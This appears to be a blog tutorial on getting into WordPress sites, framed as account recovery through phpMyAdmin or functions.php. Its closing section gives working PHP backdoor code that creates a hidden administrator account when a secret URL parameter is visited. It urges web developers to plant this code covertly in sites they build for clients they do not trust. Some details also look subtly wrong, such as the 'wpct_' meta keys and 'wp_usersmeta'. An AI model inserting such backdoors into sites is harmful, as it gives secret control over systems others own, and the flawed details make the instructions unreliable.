How to Hack Into a WordPress Website, The Complete Guide
We don’t condone, approve nor encourage any illegal or malicious behavior! The purpose of this article is to explain how to hack or regain access to a WordPress site that belongs to you, or that you have rights to edit, admin, and access. Whatever you do, you’re doing it on your own. We’re not responsible for your actions. This guide serves only for educational purposes.
Described methods will help you regain access to the site even if you no longer have an account, but will require some info about the site and they won’t help you hack into any random WordPress installation.
If you’re in one of the following situations, our methods will help you regain access:
- you forgot the username or email address
- reset password option does not work on the hosting server
- reset password emails are not coming through
- you no longer have access to the account’s email address
- you know the username & password, but the combination just does not work
To use the methods described below, you’ll need only one of the following:
- FTP access to the server, or
- cPanel access to the server, or
- access to the MySQL database and the ability to connect to it remotely
Method #1 – the MySQL way
Use this method to change the password (or username if needed) of an existing user or to create a new account. You’ll need cPanel access or direct MySQL access to the site’s database. Let’s get started by changing the password of an existing user.
If you’re using cPanel, login (cPanel can always be accessed via the https://yoursite.com:2083 link), locate and open phpMyAdmin. The list of databases and tables is on the left. You’re looking for the table that ends in _users. It’ll probably be wp_users, but if you have more than one WordPress site installed on the server, you have to find the right one.
The right table will have the user you want to edit in it. Follow the same procedure if you’re connecting to MySQL via some external client like SQLyog. Once you locate the table and the actual user record, it’s time to change the password.
As you’ve probably figured out by now, the password is saved in the user_pass field, hashed using the MD5 algorithm. Open the online MD5 generator enter the password you want to use and click “Hash”. Copy the generated string and replace the original password with it. In phpMyAdmin, you can edit the field by double-clicking on it. The procedure is similar to other MySQL clients. Save changes and login to WordPress with your new password.
Still on method #1 – creating a new user
Creating a new user is a bit more complicated but still manageable in less than a minute. Create a new record in the users' table and populate user_login, user_pass (hashed, using the MD5 function described above), and user_email. All other fields can remain empty; they don’t matter. Save the new record. Once saved, MySQL will give it a unique ID. It’s the number in the ID field. Remember it.
Now go to _usermeta table. Remember, the table’s prefix has to be the same as the users’ one. For instance wp_users and wp_usersmeta. If the prefix is not the same, you’re editing the wrong table (of some other WP installation) and the new account won’t work. We’ll create two new records. Ignore the umeta_id field for both of them. Set user_id field to the value you just remembered (the new ID value in users table). For the first record set meta_key to wpct_user_level and meta_value to 10. For the second one meta_key to wpct_capabilities and meta_value to a:1:{s:13:"administrator";b:1;}. Save both. You’re done – login!
Method #2 – the functions.php way
This approach can be utilized either by editing functions.php through cPanel or by using an FTP client to do so. If using cPanel find File Manager and open it. First, we have to find the active theme’s folder.
Go to public_html/wp_content/themes folder. If you immediately see your theme and know which one it is – great. Open its folder and start editing functions.php. If not, open the site, right-click anywhere, select “View source”. Then press Ctrl + F and start typing /themes/ soon you’ll have a lot of URLs highlighted, and you’ll recognize the folder name of the active theme.
Find it in the file structure, open, and start editing functions.php. Copy/paste the following code at the end of the file. Mind the closing ?> PHP tags if you have them. They have to be on the last line. So insert the code before them.
$new_user_email = '[email protected]';
$new_user_password = '12345';
if(!username_exists($new_user_email)) {
$user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);
wp_update_user(array('ID' => $user_id, 'nickname' => $new_user_email));
$user = new WP_User($user_id);
$user->set_role('administrator');
}Edit only the first two lines of the code to reflect your new account. If there’s already a user in WP with that email a new account won’t be created, so make sure it’s new. Change the password as well – don’t get hacked by script kiddies. After saving the file simply open your site, the code will be run, a new account with administrator privileges created and you’ll be able to login with it.
After you do so, remember to delete the code from functions.php.
Other hacking methods
By knowing the FTP, cPanel or MySQL password you’re proving that you have legitimate access right to the server and therefore should have access to the WordPress installation(s) as well. If you don’t have any of those accounts, then you’re up to no good (hacking into other people sites), and that’s not nice!
How to create a backdoor in WordPress
When the front door is closed, you might try the back door. This might sound like a malicious way of using the code for entering the site without having the access to it, but there are actually times when you need to control your own site if somebody stole it.
If it’s creating websites for other people something you do, sooner or later there will be a client who will refuse to pay you for your work; a client who will delete your login information and take over control of everything you have done. Sometimes, it will be enough to create a new user via FTP or to reset a password. When that’s not enough, you might want to hack your way back in or create a backdoor access to your admin pages.
But if you decided to hide a small piece of code in your WordPress environment, you might save yourself some dignity and gain access to the WordPress site with administrator privileges. And that’s where the games begin.
No matter how many times this thief deletes your information or restores a backup on a server he probably owns, there is a chance he doesn’t know anything about backdoor entrances. If he did, he probably wouldn’t even need your help in setting up WordPress, right?
Create a backdoor:
OK, enough with the talk; here’s a piece of code you will need to get the job done:
- Open functions.php file
- Copy/Paste the following code:
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>- Save changes
If you leave the code as it is, all you would have to do to create a new admin on the site is visit http://www.yourdomain.com/?backdoor=knockknock
After the page was loaded, your new username is “name” and password “pass”.
Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want. You can also change the link to your back door by changing ‘backdoor’ and/or ‘knockknock’ to anything you come up with.
Try the function – not only it is fun but it can really help you sometime in the future when you’re about to make a website for someone you can’t trust completely. You should also level up your WordPress and blogging skills.
No comments: